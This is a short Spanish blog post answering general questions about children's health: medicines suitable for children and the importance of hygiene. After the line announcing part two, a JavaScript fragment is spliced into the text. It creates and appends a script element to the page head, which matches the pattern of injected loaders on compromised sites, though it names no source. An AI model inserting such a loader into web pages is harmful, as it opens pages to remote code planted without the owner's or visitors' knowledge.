Salud y belleza » Medicina

Dudas habituales sobre los niños y las enfermedades I

Sin Comentarios

Desde una perspectiva médica, niños y adultos son tan diferentes como patatas y tomates: los niños no pueden tomar ciertos antibióticos, así como tampoco pueden ser sometidos a determinados tratamientos. Sufren más de lo que gozan, todo por su corta edad y su pequeño desarrollo. Son vulnerables. De acuerdo a esas condiciones, surgen las preguntas: “¿qué pasa con los niños y las enfermedades?”.

¿Los niños pueden tomar los mismos medicamentos que un adulto?

De ninguna manera. Existen medicamentos particulares controlados de acuerdo a las necesidades de los niños. Si bien puede poseer drogas similares, tienen otra clase de refuerzos menos potentes. Es vital, pasar por un especialista antes de darle cualquier medicina a un niño inferior a los doce años.

¿Qué papel juega la higiene en la salud de los niños?

Por el tipo de vida que lleva, o debería de llevar, un niño pequeño (contacto, exposición a miles de gérmenes) se torna importantísima la higiene. Pero la limpieza y desinfectación debe extenderse, principalmente, a su entorno: juguetes y artículos de contacto.

¡No te pierdas la segunda parte del artículo!var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.